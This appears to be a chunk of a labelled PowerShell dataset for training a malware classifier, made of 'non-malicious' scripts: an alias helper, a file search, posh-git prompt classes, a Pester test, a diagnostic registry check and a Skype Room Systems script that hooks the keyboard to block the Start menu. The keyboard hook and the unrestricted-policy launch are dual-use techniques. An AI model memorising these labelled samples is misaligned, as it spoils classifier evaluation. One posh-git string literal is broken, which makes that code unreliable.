# MTAyOTEwNDIxM1owdzA9BgorBgEEAYRZCgQBMS8wLTAKAgUA6snpBQIBADAKAgEA
# AgIa1wIB/zAHAgEAAgITPjAKAgUA6ss6hQIBADA2BgorBgEEAYRZCgQCMSgwJjAM
# BgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEB
# CwUAA4IBAQAb6NwhJU6AqC9y7uh2hreA2bMAlUuzSXcR6GPun/rHgrgfQTe4RBRr
# /jfnUT+KQlJtxfDU/IHDXlRFv0FVU5U7cety3IMK0/IZ1ahLcCNSLoMvMnyiTjO3
# qKyN4MEFl3yXKar4dOwpuXIc6RDKvk90wK2dB5N/J0xbq7DWoizimYbYj0s0Eb/3
# 9OIVKvzQ2C32cLh8WRrg+s29DIGtm6yPrp1YUMXeXEBzc765thUReieMSIXpuMhk
# wVuch5mEOYFv2ftoL3lD4CGRFEwUHwwt1rgfRwyWQ+pn3ZXRAA+1v5iEzjN81+VP
# 8zAakq6wB0hFJ6xpVsYTxo1Q4u6bJqYJMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
# BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0
# IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAIAC9eqfxsqF1YAAQAAAgAwDQYJYIZI
# AWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG
# 9w0BCQQxIgQg4xNBQ4ZOaARUeMrgh2COv9O9yChfjtauC8Of3vQt+4MwgfoGCyqG
# SIb3DQEJEAIvMYHqMIHnMIHkMIG9BCDUyO3sNZ3burBNDGUCV4NfM2gH4aWuRudI
# k/9KAk/ZJzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5n
# dG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y
# YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMz
# AAACAAvXqn8bKhdWAAEAAAIAMCIEIL1IrqDou+p7PvcuEWcaTRFbuM53lAEMQcad
# RIs4/Ph4MA0GCSqGSIb3DQEBCwUABIICAC+tWClhuzyL5KASHN8L0zRvEwG3JblA
# Jh1aNC7/zbXKaIIfj6haC1kdCAyeptDRn5ILNB6rrFN1gC5YjXLIs5tl6xvAyaMk
# eqL18tgNRGMBLRqDyyBrTPWyEbt2eJ1QyFyURDPU3rihNVn2IT2JhViWXRiYMtqT
# 5dRTtjTJRDUaCXQ0W4xk77JT3UG67GmiBgcSBO+FqKaLjo4it0KlX4+TVxLdgc28
# 6ivkmR3kWHvv5tkrFGNhylvqbcdWDY5tLcM/VxQ0i2MWshBoO3ZqNElZkCAtUFrJ
# GRMKPZVu9WC+Avanzb8MizRZSzaaagy/5w718YCRHQRNdq+8Sm7xlUUFXGmUrK57
# yXiG0z2hngFsbjoihi63diJHMPfNSOnXK5nh/BBqjii29vJ1ACQfIohOf9USTC04
# j4dixLYYtdol5ZftTILQtPDn1xogqX1A7h5RRAvF9iMqpmUiiKHyf0AbPIdLYS7W
# C+lwt6UjqIRpQd7Fb3Ogc1HDE8HhkP8spaeUK0qOQ7y87qZWuzRBxQDuPceKKGbU
# sh70g++q4GttiFXntHrOosoHAF8fqqtbZwcw1CODyCH6j6K8l4nLrgiyoez37zKH
# 33qd7JqzAOp7QOR4zXezze4EG3lau9n/fzaiLCAevsBvGNFtkw2eQ4VCpoVY/EuI
# Wu2BQ4BbexAG
# SIG # End signature block
|
combined_dataset/train/non-malicious/Get-AliasSuggestion.ps1
|
Get-AliasSuggestion.ps1
|
##############################################################################\n##\n## Get-AliasSuggestion\n##\n## From Windows PowerShell Cookbook (O'Reilly)\n## by Lee Holmes (http://www.leeholmes.com/guide)\n##\n##############################################################################\n\n<#\n\n.SYNOPSIS\n\nGet an alias suggestion from the full text of the last command. Intended to\nbe added to your prompt function to help learn aliases for commands.\n\n.EXAMPLE\n\nGet-AliasSuggestion Remove-ItemProperty\nSuggestion: An alias for Remove-ItemProperty is rp\n\n#>\n\nparam(\n ## The full text of the last command\n $LastCommand\n)\n\nSet-StrictMode -Version Latest\n\n$helpMatches = @()\n\n## Find all of the commands in their last input\n$tokens = [Management.Automation.PSParser]::Tokenize(\n $lastCommand, [ref] $null)\n$commands = $tokens | Where-Object { $_.Type -eq "Command" }\n\n## Go through each command\nforeach($command in $commands)\n{\n ## Get the alias suggestions\n foreach($alias in Get-Alias -Definition $command.Content)\n {\n $helpMatches += "Suggestion: An alias for " +\n "$($alias.Definition) is $($alias.Name)"\n }\n}\n\n$helpMatches
|
combined_dataset/train/non-malicious/3121.ps1
|
3121.ps1
|
function Find-StringInFile
{
[CmdletBinding()]
param(
[Parameter(
Position=0,
Mandatory=$true,
HelpMessage="String to find")]
[String]$Search,
[Parameter(
Position=1,
HelpMessage="Folder where the files are stored (search is recursive)")]
[ValidateScript({
if(Test-Path -Path $_)
{
return $true
}
else
{
throw "Enter a valid path!"
}
})]
[String]$Path = (Get-Location),
[Parameter(
Position=2,
HelpMessage="String must be case sensitive (Default=false)")]
[switch]$CaseSensitive
)
Begin{
}
Process{
$Strings = Get-ChildItem -Path $Path -Recurse | Select-String -Pattern ([regex]::Escape($Search)) -CaseSensitive:$CaseSensitive | Group-Object -Property Path
foreach($String in $Strings)
{
$IsBinary = Test-IsFileBinary -FilePath $String.Name
foreach($Group in $String.Group)
{
[pscustomobject] @{
Filename = $Group.Filename
Path = $Group.Path
LineNumber = $Group.LineNumber
IsBinary = $IsBinary
Matches = $Group.Matches
}
}
}
}
End{
}
}
|
combined_dataset/train/non-malicious/7.ps1
|
7.ps1
|
enum BranchBehindAndAheadDisplayOptions { Full; Compact; Minimal }
enum UntrackedFilesMode { Default; No; Normal; All }
class PoshGitCellColor {
[psobject]$BackgroundColor
[psobject]$ForegroundColor
PoshGitCellColor() {
$this.ForegroundColor = $null
$this.BackgroundColor = $null
}
PoshGitCellColor([psobject]$ForegroundColor) {
$this.ForegroundColor = $ForegroundColor
$this.BackgroundColor = $null
}
PoshGitCellColor([psobject]$ForegroundColor, [psobject]$BackgroundColor) {
$this.ForegroundColor = $ForegroundColor
$this.BackgroundColor = $BackgroundColor
}
hidden [string] ToString($color) {
$ansiTerm = "$([char]27)[0m"
$colorSwatch = " "
$str = ""
if (!$color) {
$str = "<default>"
}
elseif (Test-VirtualTerminalSequece $color -Force) {
if ($global:GitPromptSettings.AnsiConsole) {
if ($color -eq $this.ForegroundColor) {
$colorSwatch = "
}
$str = "${color}$colorSwatch${ansiTerm} "
}
$str = "`"$(EscapeAnsiString $color)`""
}
else {
if ($global:GitPromptSettings.AnsiConsole) {
$bg = Get-BackgroundVirtualTerminalSequence $color
$str = "${bg}${colorSwatch}${ansiTerm} "
}
if ($color -is [int]) {
$str += "0x{0:X6}" -f $color
}
else {
$str += $color.ToString()
}
}
return $str
}
[string] ToEscapedString() {
if (!$global:GitPromptSettings.AnsiConsole) {
return ""
}
$str = ""
if ($this.ForegroundColor) {
if (Test-VirtualTerminalSequece $this.ForegroundColor) {
$str += EscapeAnsiString $this.ForegroundColor
}
else {
$seq = Get-ForegroundVirtualTerminalSequence $this.ForegroundColor
$str += EscapeAnsiString $seq
}
}
if ($this.BackgroundColor) {
if (Test-VirtualTerminalSequece $this.BackgroundColor) {
$str += EscapeAnsiString $this.BackgroundColor
}
else {
$seq = Get-BackgroundVirtualTerminalSequence $this.BackgroundColor
$str += EscapeAnsiString $seq
}
}
return $str
}
[string] ToString() {
$str = "ForegroundColor: "
$str += $this.ToString($this.ForegroundColor) + ", "
$str += "BackgroundColor: "
$str += $this.ToString($this.BackgroundColor)
return $str
}
}
class PoshGitTextSpan {
[string]$Text
[psobject]$BackgroundColor
[psobject]$ForegroundColor
PoshGitTextSpan() {
$this.Text = ""
$this.ForegroundColor = $null
$this.BackgroundColor = $null
}
PoshGitTextSpan([string]$Text) {
$this.Text = $Text
$this.ForegroundColor = $null
$this.BackgroundColor = $null
}
PoshGitTextSpan([string]$Text, [psobject]$ForegroundColor) {
$this.Text = $Text
$this.ForegroundColor = $ForegroundColor
$this.BackgroundColor = $null
}
PoshGitTextSpan([string]$Text, [psobject]$ForegroundColor, [psobject]$BackgroundColor) {
$this.Text = $Text
$this.ForegroundColor = $ForegroundColor
$this.BackgroundColor = $BackgroundColor
}
PoshGitTextSpan([PoshGitTextSpan]$PoshGitTextSpan) {
$this.Text = $PoshGitTextSpan.Text
$this.ForegroundColor = $PoshGitTextSpan.ForegroundColor
$this.BackgroundColor = $PoshGitTextSpan.BackgroundColor
}
PoshGitTextSpan([PoshGitCellColor]$PoshGitCellColor) {
$this.Text = ''
$this.ForegroundColor = $PoshGitCellColor.ForegroundColor
$this.BackgroundColor = $PoshGitCellColor.BackgroundColor
}
[PoshGitTextSpan] Expand() {
if (!$this.Text) {
return $this
}
$execContext = Get-Variable ExecutionContext -ValueOnly
$expandedText = $execContext.SessionState.InvokeCommand.ExpandString($this.Text)
$newTextSpan = [PoshGitTextSpan]::new($expandedText, $this.ForegroundColor, $this.BackgroundColor)
return $newTextSpan
}
[string] ToAnsiString() {
$reset = [System.Collections.Generic.List[string]]::new()
$e = [char]27 + "["
$fg = $this.ForegroundColor
if (($null -ne $fg) -and !(Test-VirtualTerminalSequece $fg)) {
$fg = Get-ForegroundVirtualTerminalSequence $fg
$reset.Add('39')
}
$bg = $this.BackgroundColor
if (($null -ne $bg) -and !(Test-VirtualTerminalSequece $bg)) {
$bg = Get-BackgroundVirtualTerminalSequence $bg
$reset.Add('49')
}
$txt = $this.Text
$str = "${fg}${bg}${txt}"
if (Test-VirtualTerminalSequece $txt -Force) {
$reset.Clear()
$reset.Add('0')
}
if ($reset.Count -gt 0) {
$str += "${e}$($reset -join ';')m"
}
return $str
}
[string] ToEscapedString() {
$str = EscapeAnsiString $this.ToAnsiString()
return $str
}
[string] ToString() {
$sep = " "
if ($this.Text.Length -lt 2) {
$sep = " " * (3 - $this.Text.Length)
}
if ($global:GitPromptSettings.AnsiConsole) {
$txt = $this.ToAnsiString()
if (Test-VirtualTerminalSequece $txt) {
$escAnsi = "ANSI: `"$(EscapeAnsiString $txt)`""
$str = "Text: `"$txt`",${sep}${escAnsi}"
}
else {
$str = "Text: `"$txt`""
}
}
else {
$txt = $this.Text
if (Test-VirtualTerminalSequece $txt -Force) {
$txt = EscapeAnsiString $txt
}
$color = [PoshGitCellColor]::new($this.ForegroundColor, $this.BackgroundColor)
$str = "Text: `"$txt`",${sep}$($color.ToString())"
}
return $str
}
}
class PoshGitPromptSettings {
[bool]$AnsiConsole = $Host.UI.SupportsVirtualTerminal -or ($Env:ConEmuANSI -eq "ON")
[bool]$SetEnvColumns = $true
[PoshGitCellColor]$DefaultColor = [PoshGitCellColor]::new()
[PoshGitCellColor]$BranchColor = [PoshGitCellColor]::new([ConsoleColor]::Cyan)
[PoshGitCellColor]$IndexColor = [PoshGitCellColor]::new([ConsoleColor]::DarkGreen)
[PoshGitCellColor]$WorkingColor = [PoshGitCellColor]::new([ConsoleColor]::DarkRed)
[PoshGitCellColor]$StashColor = [PoshGitCellColor]::new([ConsoleColor]::Red)
[PoshGitCellColor]$ErrorColor = [PoshGitCellColor]::new([ConsoleColor]::Red)
[PoshGitTextSpan]$PathStatusSeparator = ' '
[PoshGitTextSpan]$BeforeStatus = [PoshGitTextSpan]::new('[', [ConsoleColor]::Yellow)
[PoshGitTextSpan]$DelimStatus = [PoshGitTextSpan]::new(' |', [ConsoleColor]::Yellow)
[PoshGitTextSpan]$AfterStatus = [PoshGitTextSpan]::new(']', [ConsoleColor]::Yellow)
[PoshGitTextSpan]$BeforeIndex = [PoshGitTextSpan]::new('', [ConsoleColor]::DarkGreen)
[PoshGitTextSpan]$BeforeStash = [PoshGitTextSpan]::new(' (', [ConsoleColor]::Red)
[PoshGitTextSpan]$AfterStash = [PoshGitTextSpan]::new(')', [ConsoleColor]::Red)
[PoshGitTextSpan]$LocalDefaultStatusSymbol = [PoshGitTextSpan]::new('', [ConsoleColor]::DarkGreen)
[PoshGitTextSpan]$LocalWorkingStatusSymbol = [PoshGitTextSpan]::new('!', [ConsoleColor]::DarkRed)
[PoshGitTextSpan]$LocalStagedStatusSymbol = [PoshGitTextSpan]::new('~', [ConsoleColor]::Cyan)
[PoshGitTextSpan]$BranchGoneStatusSymbol = [PoshGitTextSpan]::new([char]0x00D7, [ConsoleColor]::DarkCyan)
[PoshGitTextSpan]$BranchIdenticalStatusSymbol = [PoshGitTextSpan]::new([char]0x2261, [ConsoleColor]::Cyan)
[PoshGitTextSpan]$BranchAheadStatusSymbol = [PoshGitTextSpan]::new([char]0x2191, [ConsoleColor]::Green)
[PoshGitTextSpan]$BranchBehindStatusSymbol = [PoshGitTextSpan]::new([char]0x2193, [ConsoleColor]::Red)
[PoshGitTextSpan]$BranchBehindAndAheadStatusSymbol = [PoshGitTextSpan]::new([char]0x2195, [ConsoleColor]::Yellow)
[BranchBehindAndAheadDisplayOptions]$BranchBehindAndAheadDisplay = [BranchBehindAndAheadDisplayOptions]::Full
[string]$FileAddedText = '+'
[string]$FileModifiedText = '~'
[string]$FileRemovedText = '-'
[string]$FileConflictedText = '!'
[string]$BranchUntrackedText = ''
[bool]$EnableStashStatus = $false
[bool]$ShowStatusWhenZero = $true
[bool]$AutoRefreshIndex = $true
[UntrackedFilesMode]$UntrackedFilesMode = [UntrackedFilesMode]::Default
[bool]$EnablePromptStatus = !$global:GitMissing
[bool]$EnableFileStatus = $true
[Nullable[bool]]$EnableFileStatusFromCache = $null
[string[]]$RepositoriesInWhichToDisableFileStatus = @()
[string]$DescribeStyle = ''
[psobject]$WindowTitle = {param($GitStatus, [bool]$IsAdmin) "$(if ($IsAdmin) {'Admin: '})$(if ($GitStatus) {"$($GitStatus.RepoName) [$($GitStatus.Branch)]"} else {Get-PromptPath}) ~ PowerShell $($PSVersionTable.PSVersion.Major).$($PSVersionTable.PSVersion.Minor) $(if ([IntPtr]::Size -eq 4) {'32-bit '})($PID)"}
[PoshGitTextSpan]$DefaultPromptPrefix = '$(Get-PromptConnectionInfo -Format "[{1}@{0}]: ")'
[PoshGitTextSpan]$DefaultPromptPath = '$(Get-PromptPath)'
[PoshGitTextSpan]$DefaultPromptBeforeSuffix = ''
[PoshGitTextSpan]$DefaultPromptDebug = [PoshGitTextSpan]::new(' [DBG]:', [ConsoleColor]::Magenta)
[PoshGitTextSpan]$DefaultPromptSuffix = '$(">" * ($nestedPromptLevel + 1)) '
[bool]$DefaultPromptAbbreviateHomeDirectory = $true
[bool]$DefaultPromptWriteStatusFirst = $false
[bool]$DefaultPromptEnableTiming = $false
[PoshGitTextSpan]$DefaultPromptTimingFormat = ' {0}ms'
[int]$BranchNameLimit = 0
[string]$TruncatedBranchSuffix = '...'
[bool]$Debug = $false
}
class PoshGitPromptValues {
[int]$LastExitCode
[bool]$DollarQuestion
[bool]$IsAdmin
[string]$LastPrompt
}
|
combined_dataset/train/non-malicious/1922.ps1
|
1922.ps1
|
Describe "Get-TraceSource" -Tags "Feature" {
It "Should output data sorted by name" {
$expected = (Get-TraceSource | Sort-Object Name)
Get-TraceSource | Should -Be $expected
}
}
|
combined_dataset/train/non-malicious/sample_34_33.ps1
|
sample_34_33.ps1
|
using module ..\..\Config.psm1
Param(
[Parameter(Mandatory=$False)]
[switch]$Launch=$false,
[Parameter(Mandatory=$False)]
[switch]$TestStatus=$false
)
Import-Module (Join-Path $PSScriptRoot "..\..\Events.psm1")
if ($TestStatus) {
return [string]([ApplyResult]::Success)
}
if (!$Launch) {
Write-EventLog @AttemptBlockStartMenu
Start-Process powershell.exe -NoNewWindow -ArgumentList ("-executionpolicy unrestricted", $PSCommandPath.Replace(" ", "`` "), "-Launch") -RedirectStandardError "NUL" -RedirectStandardInput "NUL" -RedirectStandardOutput "NUL"
Write-EventLog @LanunchBlockStartMenu
return
}
Add-Type -TypeDefinition @"
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SkypeRoomSystems
{
public static class BlockStartMenu
{
[STAThread]
public static void Main()
{
try
{
hook = DLLImports.SetWindowsHookEx(DLLImports.WH_KEYBOARD_LL, lowLevelKeyboardProc, GetCurrentModuleHandle(), 0);
Application.Run();
}
catch (Exception e)
{
EventLogger.LogException(e);
}
}
private static IntPtr GetCurrentModuleHandle()
{
return DLLImports.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName);
}
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode == 0)
{
var keyPressed = (Keys)Marshal.ReadInt32(lParam);
if (wParam == DLLImports.WM_SYSKEYDOWN || wParam == DLLImports.WM_KEYDOWN)
{
keysPressed.Add(keyPressed);
}
else if (wParam == DLLImports.WM_SYSKEYUP || wParam == DLLImports.WM_KEYUP)
{
if ((keysPressed.Count == 1 && (keysPressed.Contains(Keys.LWin) || keysPressed.Contains(Keys.RWin))) || // Only LWin or RWin pressed and released
(keysPressed.Count == 2 && keysPressed.Contains(Keys.LWin) && keysPressed.Contains(Keys.RWin))) // Both LWin and RWin pressed and either released
{
DLLImports.keybd_event((byte)Keys.Escape, 0, DLLImports.KEYEVENTF_KEYDOWN, 0);
DLLImports.keybd_event((byte)keyPressed, 0, DLLImports.KEYEVENTF_KEYUP, 0);
DLLImports.keybd_event((byte)Keys.Escape, 0, DLLImports.KEYEVENTF_KEYUP, 0);
// Block start menu
return (IntPtr)1;
}
keysPressed.Remove(keyPressed);
}
}
// no-op, call next hook
return DLLImports.CallNextHookEx(hook, nCode, wParam, lParam);
}
private static IntPtr hook = IntPtr.Zero;
private static HashSet<Keys> keysPressed = new HashSet<Keys>();
private static DLLImports.LowLevelKeyboardProc lowLevelKeyboardProc = HookCallback;
}
static class EventLogger
{
public static void LogException(Exception e)
{
WriteEntry(CRASH_EVENT, EventLogEntryType.Error, string.Format(CRASH_EVENT_FORMAT_STRING, e.HResult.ToString("X8"), e.Message));
}
private static void WriteEntry(int eventId, EventLogEntryType entryType, string message)
{
try
{
IntPtr hEventLog = DLLImports.RegisterEventSource(null, SOURCE);
DLLImports.ReportEvent(hEventLog, (ushort)entryType, 0, eventId, IntPtr.Zero, 1, 0, new string[] { message }, null);
DLLImports.DeregisterEventSource(hEventLog);
}
catch (Exception) { /*Do nothing*/ }
}
private const string SOURCE = "SkypeRoomSystem";
private const int CRASH_EVENT = 4901;
private const string CRASH_EVENT_FORMAT_STRING = "BlockStartMenu Crashed : {0} : {1}";
}
static class DLLImports
{
public const int WH_KEYBOARD_LL = 13;
public const uint KEYEVENTF_KEYDOWN = 0x0000;
public const uint KEYEVENTF_KEYUP = 0x0002;
public readonly static IntPtr WM_KEYDOWN = new IntPtr(0x0100);
public readonly static IntPtr WM_SYSKEYDOWN = new IntPtr(0x0104);
public readonly static IntPtr WM_KEYUP = new IntPtr(0x0101);
public readonly static IntPtr WM_SYSKEYUP = new IntPtr(0x0105);
public delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, int dwExtraInfo);
[DllImport("advapi32.dll")]
public static extern IntPtr RegisterEventSource(string lpUNCServerName, string lpSourceName);
[DllImport("advapi32.dll")]
public static extern bool DeregisterEventSource(IntPtr hEventLog);
[DllImport("advapi32.dll", EntryPoint = "ReportEventW", CharSet = CharSet.Unicode)]
public static extern bool ReportEvent(
IntPtr hEventLog,
ushort wType,
ushort wCategory,
int dwEventID,
IntPtr lpUserSid,
ushort wNumStrings,
uint dwDataSize,
string[] lpStrings,
byte[] lpRawData);
}
}
"@ -ReferencedAssemblies System.Windows.Forms
[SkypeRoomSystems.BlockStartMenu]::Main();
|
combined_dataset/train/non-malicious/sample_8_42.ps1
|
sample_8_42.ps1
|
#************************************************
# TS_AppCompatDisabledCheck.ps1
# Version 1.0.1
# Date: 6/8/2012
# Author: v-blchen
# Description: [Idea ID 3317] [Windows] DisableEngine reg entry can cause app install or registration failure
# Rule number: 3317
# Rule URL: http://sharepoint/sites/rules/Rule Submissions/Forms/DispForm.aspx?ID=3317
#************************************************
Import-LocalizedData -BindingVariable ScriptStrings
Display-DefaultActivity -Rule -RuleNumber 3317
$RuleApplicable = $false
$RootCauseDetected = $false
$RootCauseName = "RC_AppCompatDisabledCheck"
$PublicContent = ""
$InternalContent = "https://vkbexternal.partners.extranet.microsoft.com/VKBWebService/ViewContent.aspx?scid=B;EN-US;2694134"
$Verbosity = "Warning"
$Visibility = "3"
$SupportTopicsID = "8022"
$Title = $ScriptStrings.ID_AppCompatDisabledCheck_ST
$InformationCollected = new-object PSObject
# ***************************
# Data Gathering
# ***************************
# check whether is applies to current system
Function AppliesToSystem
{
if ((($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 0)) -or # Server 2008 / Vista
(($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 1)) -or # Win 7/R2
(($OSVersion.Major -eq 6) -and ($OSVersion.Minor -eq 2)) -or # Win8/Server 2012
($OSVersion.Major -eq 10) ) # Win10
{
return $true
}
else
{
return $false
}
}
# check whether the state of ApplicationCompatibilityEngine is set to 1
Function CheckStateOfApplicationCompatibilityEngine
{
$AppCompatkey = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat"
if(Test-Path $AppCompatkey)
{
$DisableEngineValue = (Get-ItemProperty -Path $AppCompatkey).DisableEngine
if($DisableEngineValue -eq 1)
{
return $true
}
}
return $false
}
# **************
# Detection Logic
# **************
#Check to see if rule is applicable to this computer
if (AppliesToSystem)
{
$RuleApplicable = $true
if ($true)
{
$RootCauseDetected = CheckStateOfApplicationCompatibilityEngine
}
}
# *********************
# Root Cause processing
# *********************
if ($RuleApplicable)
{
if ($RootCauseDetected)
{
# Red/ Yellow Light
Update-DiagRootCause -id $RootCauseName -Detected $true
Write-GenericMessage -RootCauseId $RootCauseName -PublicContentURL $PublicContent -InformationCollected $InformationCollected -Verbosity $Verbosity -Visibility $Visibility -SupportTopicsID $SupportTopicsID -InternalContentURL $InternalContent -SolutionTitle $Title
}
else
{
# Green Light
Update-DiagRootCause -id $RootCauseName -Detected $false
}
}
# SIG # Begin signature block
# MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCMDiDLk4CNsZFP
# I/A5hx7k/a4nkHNH4s51XYFLN4iTb6CCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
